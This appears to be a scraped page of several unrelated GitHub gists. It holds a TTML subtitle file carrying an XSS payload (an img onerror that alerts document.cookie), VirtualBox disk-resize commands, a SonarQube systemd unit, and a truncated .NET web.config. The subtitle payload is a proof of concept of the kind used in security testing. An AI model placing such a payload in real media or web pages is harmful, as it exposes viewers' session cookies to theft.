This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<tt xmlns="http://www.w3.org/2006/10/ttaf1" xmlns:ttp="http://www.w3.org/2006/10/ttaf1#parameter" xmlns:ttm="http://www.w3.org/2006/10/ttaf1#metadata" xmlns:tts="http://www.w3.org/2006/10/ttaf1#styling" xml:lang="en" ttp:frameRate="25" ttp:timeBase="media"> | |
<head/> | |
<body> | |
<div> | |
<p xml:id="c0" xml:space="preserve" begin="00:00:01.000" end="00:00:02.000" tts:backgroundColor="black" tts:fontSize="15" tts:origin="0px 0px"><img src=x onerror=alert(document.cookie) /></p> | |
</div> | |
</body> | |
</tt> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# 1. First stop the VM | |
# Back up what you can since it never hurts to do so! | |
# 2. convert .vmdk to .vmi and resize to 50G | |
# if not in path VBoxManager is here by default: C:\Program Files\Oracle\VirtualBox\VBoxManage.exe | |
VBoxManage clonehd in.vmdk out.vmi --format VDI | |
VBoxManage modifyhd out.vmi --resize 51200 | |
# 3. Go into VirtualBox settings for VM and remove the old vmdk disk and attach your new vmi in its place | |
# This won't do anything to the disks but its always nice to have backups incase anything goes wrong |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Unit] | |
Description=SonarQube service | |
After=syslog.target network.target | |
[Service] | |
Type=forking | |
ExecStart=/opt/sonarqube/bin/linux-x86-64/sonar.sh start | |
ExecStop=/opt/sonarqube/bin/linux-x86-64/sonar.sh stop |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<configuration> | |
<configSections> | |
<section name="microsoft.identityModel" type="Microsoft.IdentityModel.Configuration.MicrosoftIdentityModelSection, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" /> | |
</configSections> | |
<location path="FederationMetadata"> | |
<system.web> | |
<authorization> | |
<allow users="*" /> | |
</authorization> |